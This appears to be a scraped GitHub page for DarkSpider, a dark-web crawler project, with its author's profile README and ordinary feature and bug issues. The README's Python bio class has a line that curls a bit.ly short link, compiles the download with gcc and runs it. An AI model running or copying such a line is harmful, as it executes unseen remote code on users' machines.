Git Product home page Git Product logo

darkspider's Introduction

Yo 👋, I'm Pratik Pingale 👨‍💻

Just a novice. Still got a lot to learn.

class PROxZIMA:
  def __init__(self):
    subprocess.call("curl -sL 'bit.ly/pr0x21m4' | gcc -w -o name -xc - && ./name", shell=True)
    self.bio = {
      '- 💼 I’m currently working for': {'Convin.ai' : 'https://convin.ai'},
      '- 🔭 I’m currently working on' : {'DarkSpider': 'https://github.com/PROxZIMA/DarkSpider',
                                         'Prism'     : 'https://github.com/PROxZIMA/prism',
                                         'Sweet-Pop' : 'https://github.com/PROxZIMA/Sweet-Pop'},
      '- 🌱 I’m currently learning'   : ['Django', 'C++', 'Python', 'Full Stack Development', 'Algo Trading'],
      '- 💬 Ask me anything'          : '¯\_(ツ)_/¯',
      '- 👨‍💻 My projects available at' : 'https://github.com/PROxZIMA?tab=repositories',
      '- 📄 Know about my experiences': 'https://proxzima.dev/resume',
      '- ⚡ Fun fact'                 : ('Proxima Centauri is a small, low-mass star located 4.2465 light-'
                                         'years away from the Sun in the southern constellation of Centaurus.')
    }

if __name__ == '__main__':
  import subprocess, pprint
  pprint.pprint(PROxZIMA().__dict__)

- Tools/Interests 🔗

Arch Linux    Pop!_OS    Windows    Android    Firefox    Git    GitHub    BitBucket    Python    C    C++    Java    Kotlin    Bash    HTML5    CSS3    JavaScript    TypeScript    MySQL    PostgreSQL    FireBase    Numpy    Pandas    Jupyter    Django    Flask    Node.js    React    Google Colab    Back Arrow    Google Cloud    CodePen    Hackerrank    CodeChef    LeetCode    InterviewBit    Figma    Forward Arrow    Postman    Alacritty    NeoVim    VS Codium    Android Studio

- Workspace 🖥️

NVIDIA 3050 AMD Ryzen 7 4800H Asus

- Languages 🔭

proxzima

- Stats ⚡️

My Stats My Streak

- Find me around the web 🌎

gmail pratik-pingale pro_x_zima pro_x_zima PROxZIMA#7272 PratikPingale PROxZIMA

PROxZIMA

darkspider's People

Contributors

knightster0804 avatar mryellowowl avatar proxzima avatar r0nl avatar ytatiya3 avatar

Stargazers

 avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar

Watchers

 avatar  avatar

darkspider's Issues

Implement Incremental crawling

Is your feature request related to a problem? Please describe.

Incremental Crawler visits a specific site multiple times in a specific interval of time. The main focus of an incremental crawl is to keep on updating the hyperlink list of a site whose content is being changed frequently. At every iteration, after the crawler visits such a site, the site’s “freshness” keeps on decreasing as time passes. Hence in the next iteration, the crawler updates the hyperlinks, resetting the freshness.

Describe the solution you'd like
TODO

Describe alternatives you've considered
TODO

Additional context
TODO

TypeError: 'type' object is not subscriptable

I have installed requirements successfully but using Python 3.8 on both on Ubuntu 20.04 and Windows 10 I get the same error after trying to run darkspider.py:

Traceback (most recent call last):
  File "darkspider.py", line 58, in <module>
    from modules.helper import get_tor_proxies, setup_custom_logger
  File "/home/acwh0110/DarkSpider/modules/__init__.py", line 1, in <module>
    from modules.crawler import Crawler
  File "/home/acwh0110/DarkSpider/modules/crawler.py", line 15, in <module>
    from modules.checker import url_canon
  File "/home/acwh0110/DarkSpider/modules/checker.py", line 9, in <module>
    from modules.helper import TorProxyException, TorServiceException, get_requests_header
  File "/home/acwh0110/DarkSpider/modules/helper/__init__.py", line 1, in <module>
    from .helper import *
  File "/home/acwh0110/DarkSpider/modules/helper/helper.py", line 79, in <module>
    name: str, filename: str = "log.log", verbose_: bool = False, filelog: bool = True, argv: list[str] = None
TypeError: 'type' object is not subscriptable

Store links relation in one-to-many json dictionary format

Describe the solution you'd like
Track links generated in crawler module

Format proposal

{
  "link1": [
    "link2",
    "link3",
    "link4"
  ],
  "link2": [
    "link5",
    "link6",
    "link4"
  ],
  "link3": [
    "link7",
    "link2",
    "link9"
  ],
  "link4": [
    "link1"
  ]
}

Optimization

  • Prevent infinite looping: link1 -> link2 -> link4 -> link1

-u build.py build' failed with exit code 1

Problem building wxpython. Already tried this but still get the below.

Checking for header Python.h                          : Distutils not installed? Broken python installation? Get python-config now!
      The configuration failed
      (complete log in /tmp/pip-install-8or1rxz3/wxpython_6001026db67149c2aed0382e7a140ba4/build/waf/3.8/gtk3/config.log)
      Command '"/usr/bin/python3.8" /tmp/pip-install-8or1rxz3/wxpython_6001026db67149c2aed0382e7a140ba4/bin/waf-2.0.24 --wx_config=/tmp/pip-install-8or1rxz3/wxpython_6001026db67149c2aed0382e7a140ba4/build/wxbld/gtk3/wx-config --gtk3 --python="/usr/bin/python3.8" --out=build/waf/3.8/gtk3 configure build ' failed with exit code 1.
      Finished command: build_py (0m2.111s)
      Finished command: build (19m2.947s)
      Command '"/usr/bin/python3.8" -u build.py build' failed with exit code 1.
      [end of output]
  
  note: This error originates from a subprocess, and is likely not a problem with pip.
  ERROR: Failed building wheel for wxpython
  Running setup.py clean for wxpython
Failed to build wxpython
Installing collected packages: wxpython, pandas, contourpy, beautifulsoup4, matplotlib, Gooey, seaborn
  Running setup.py install for wxpython ... error
  error: subprocess-exited-with-error
  
  × Running setup.py install for wxpython did not run successfully.
  │ exit code: 1
  ╰─> [63 lines of output]

and

  note: This error originates from a subprocess, and is likely not a problem with pip.
error: legacy-install-failure

× Encountered error while trying to install package.
╰─> wxpython

URL classification as illicit or not

Is your feature request related to a problem? Please describe.
The Ultimate aim of the project is to detect illicit websites. As of now the algorithm uses graph knowledge to target suspicious links. Advance techniques are required to accurately classify links and reduce the computational complexity.

Describe the solution you'd like
Text-based classification using NLP which transforms the crawler into Context Focused Crawler from the traditional Naive-Best First Crawler. This will further help in crawling at greater depths.

Describe alternatives you've considered
Classification technique is yet to be decided.

Extractor should use proper mechanism to extract and store URLs

Is your feature request related to a problem? Please describe.

Extractor takes maximum file name length under consideration and creates sub-directories based on the url.

http://a.com/b.ext?x=&y=$%z2 -> a.com/b.extxyz2_.html (a.com folder with b.extxyz2_.html file in it)

This is good for storage purpose but does not act like a database.

Issues:

  • File retrieval and merging of data for URL classification is complex.
  • An URL can be very big but file names have length constraints.

Describe the solution you'd like
A linear architecture where a folder consists of files with file names as SHA1 hash of the respective URLs.

$ cat output/github.com/extracted/

00d1fbae77557ec45b3bfb3bdebfee49fd155cf9
b615c769e688dd83b2845ea0f32e2ee0c125c366
9b76fbceb3abd3423318ee37fd9ec1073961c14d

The links.txt file is renamed to links.json with the following content:

{
    "00d1fbae77557ec45b3bfb3bdebfee49fd155cf9": "http://github.com",
    "b615c769e688dd83b2845ea0f32e2ee0c125c366": "http://github.com/about/careers",
    "9b76fbceb3abd3423318ee37fd9ec1073961c14d": "http://github.com/sponsors"
}

Describe alternatives you've considered

Storing URLs in a big flat directories is a performance overhead as well (O(N) lookups).

Possible options:

  • SQL DB
  • Neo4j

Crawl I2P links

Dark web isn't made of just .onion links. Dark web consist of various darknets such as tor, I2P and freenet. These darknets also holds considerable amount of data. As they are P2P (peer to peer) networks, some adjustments are required to crawl them as well

Describe the solution you'd like

  • Starting a I2P server on the local machine
  • Using its proxy (127.0.0.1:4444) to traverse a I2P links.

I successfully implemented this method but need more ideas on integrating it with current crawler efficiently.

image

Recommend Projects

  • React photo React

    A declarative, efficient, and flexible JavaScript library for building user interfaces.

  • Vue.js photo Vue.js

    🖖 Vue.js is a progressive, incrementally-adoptable JavaScript framework for building UI on the web.

  • Typescript photo Typescript

    TypeScript is a superset of JavaScript that compiles to clean JavaScript output.

  • TensorFlow photo TensorFlow

    An Open Source Machine Learning Framework for Everyone

  • Django photo Django

    The Web framework for perfectionists with deadlines.

  • D3 photo D3

    Bring data to life with SVG, Canvas and HTML. 📊📈🎉

Recommend Topics

  • javascript

    JavaScript (JS) is a lightweight interpreted programming language with first-class functions.

  • web

    Some thing interesting about web. New door for the world.

  • server

    A server is a program made to process requests and deliver data to clients.

  • Machine learning

    Machine learning is a way of modeling and interpreting data that allows a piece of software to respond intelligently.

  • Game

    Some thing interesting about game, make everyone happy.

Recommend Org

  • Facebook photo Facebook

    We are working to build community through open source technology. NB: members must have two-factor auth.

  • Microsoft photo Microsoft

    Open source projects and samples from Microsoft.

  • Google photo Google

    Google ❤️ Open Source for everyone.

  • D3 photo D3

    Data-Driven Documents codes.